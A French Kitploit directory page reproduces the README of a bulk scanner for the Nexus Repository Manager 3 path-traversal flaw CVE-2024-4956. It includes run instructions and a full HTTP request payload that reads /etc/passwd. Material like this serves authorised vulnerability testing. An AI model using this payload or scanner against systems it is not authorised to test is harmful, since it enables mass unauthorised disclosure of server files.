Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4956-Bulk-Scanner — [CVE-2024-4956] Scanner en masse de traversée de chemin non authentifié pour Nexus Repository Manager 3 | Kitploit
Outils/GitHubGitHub/ifconfig-me/cve-2024-4956-bulk-scanner
Scanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubifconfig-me/cve-2024-4956-bulk-scanner

CVE-2024-4956-Bulk-Scanner

[CVE-2024-4956] Scanner en masse de traversée de chemin non authentifié pour Nexus Repository Manager 3

Voir le dépôt
1764il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

README.md

CVE-2024-4956 Scanner en masse

Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des tests dans des environnements d'entreprise. https://twitter.com/nav1n0x/ et https://github.com/ifconfig-me déclinent toute responsabilité en cas d'utilisation abusive de ce code. Utilisez-le à vos propres risques. N'attaquez pas une cible que vous n'avez pas la permission de cibler. Cet outil utilise le payload publié publiquement.

Ce scanner aide les passionnés de sécurité à scanner la vulnérabilité de traversée de chemin (Path Traversal) sur les cibles Nexus Repository en masse.

Le scanner affichera le nombre de cibles chargées et l'état du scan en cours. Les URL seront listées avec trois messages d'état : Timeout, Échec ou Succès, selon les résultats. Assurez-vous que targets.txt contient la liste des domaines et lfi-payloads.txt la liste des charges utiles (payloads). Le scanner affichera l'URL en cours de test, se mettant à jour à chaque nouvelle requête, et indiquera respectivement le succès ou l'échec. Le script sauvegarde également une liste des URL réussies dans le répertoire sous le nom successful_urls.txt. Il fournira un résumé du nombre de tentatives réussies à la fin.

Installation

Assurez-vous d'avoir Python 3.6+ et pip installés.

  1. Clonez le dépôt :

    • git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.git
    • cd CVE-2024-4956-Bulk-Scanner
  2. Installez les dépendances nécessaires :

    pip install -r requirements.txt

Instructions d'utilisation

  1. Préparez votre fichier targets.txt avec la liste des domaines et lfi-payloads.txt avec la liste des charges utiles (payloads).

  2. Lancez le scanner :

    python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

Attaque réussie

image

Scanner en action

image

Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des tests dans des environnements d'entreprise. https://twitter.com/nav1n0x/ et https://github.com/ifconfig-me déclinent toute responsabilité concernant le code. Utilisez-le à vos propres risques. N'attaquez pas une cible que vous n'avez pas la permission de cibler.

Télécharger l’outil